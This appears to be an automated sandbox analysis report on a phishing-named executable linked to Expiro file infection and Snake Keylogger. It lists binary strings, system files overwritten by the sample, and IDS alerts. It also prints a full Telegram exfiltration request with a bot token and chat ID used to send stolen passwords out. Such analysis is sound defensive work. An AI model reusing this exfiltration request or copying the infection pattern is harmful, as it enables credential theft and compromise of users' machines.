              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.1.dr
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
              Source: Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wbengine.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2160709430.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.2143704164.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ifsutil.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: udfs.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
              Source: Binary string: ALG.pdbGCTL source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssapi.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: spp.pdb source: WBEngine.0.etl.23.dr

              Spreading

              barindex
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49730 -> 54.244.188.177:80
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53313 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49766 -> 82.112.184.197:80
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:55105 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49737 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1da91996ff1aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 172.234.222.143 172.234.222.143
              Source: Joe Sandbox ViewIP Address: 72.52.179.174 72.52.179.174
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49734
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49734
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49735
